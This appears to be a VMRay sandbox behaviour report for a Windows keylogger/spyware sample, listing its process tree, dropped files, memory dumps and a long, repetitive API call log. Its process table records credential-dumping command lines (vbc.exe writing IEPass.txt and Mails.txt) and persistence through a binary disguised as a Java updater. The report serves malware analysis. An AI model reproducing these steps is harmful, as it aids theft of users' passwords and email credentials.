b77b82fa...2607 | Sequential Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Trojan

gmmqacgpk.exe

Windows Exe (x86-32)

Created at 2019-07-22T00:24:00

...

Remarks (1/1)

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa60 Analysis Target High (Elevated) gmmqacgpk.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe" -
#2 0xb18 Child Process High (Elevated) msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #1
#4 0xbf8 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt #2
#5 0x594 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt #2
#7 0x4e8 Autostart Medium javaupdtr.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe" -
#8 0x708 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7
#9 0x718 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7

Behavior Information - Sequential View

Process #1: gmmqacgpk.exe
340 0
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:36, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
»
Information Value
PID 0xa60
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A64
0x A74
0x A78
0x A7C
0x A80
0x A84
0x B20
0x B24
0x B30
0x B34
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x74843870, 0x74828140 False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483BB90, 0x74839940 False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483FEDC, 0x74827478, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F386A0, 0x73F37A6C, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F8A650, 0x73E891D0, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F3A025, 0x73F39DF8, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4FC90 False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4C0FC False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F33B94, 0x73F53EB4, ... False False
...
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F7F441, 0x73F4AADE, ... False False
...
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483A7F0, 0x74831FAC False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 51 bytes MD5: 112a15fe8f0812fb5b44e44f1b5a8df2
SHA1: fa53bc2d594d4a1307176406fe4c4b63f01607ae
SHA256: fb83cd90872a11a04c5df9734833cf8e0e4adf6af25d9ded59dcbae3e77dfccf
SSDeep: 3:oNBiTktGaACIIUvJLACn:oNUTk4FC1URLNn 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 64 bytes MD5: 8298bd7dd49a941d4f9dee3f49df4857
SHA1: 8820f66e7123fdfae68c1a049286576c5c58910c
SHA256: 0bba49534b921bcfc1b5f71926165f357add38b22a48763d946d55e4e8ab46db
SSDeep: 3:oNBiTktG+Vh4EaKC5cEcTrkCn:oNUTk4aJaZ5cTTrkCn 		False
...
Threads
Thread 0xa64
339 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 51 True 1
Fn
Data
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
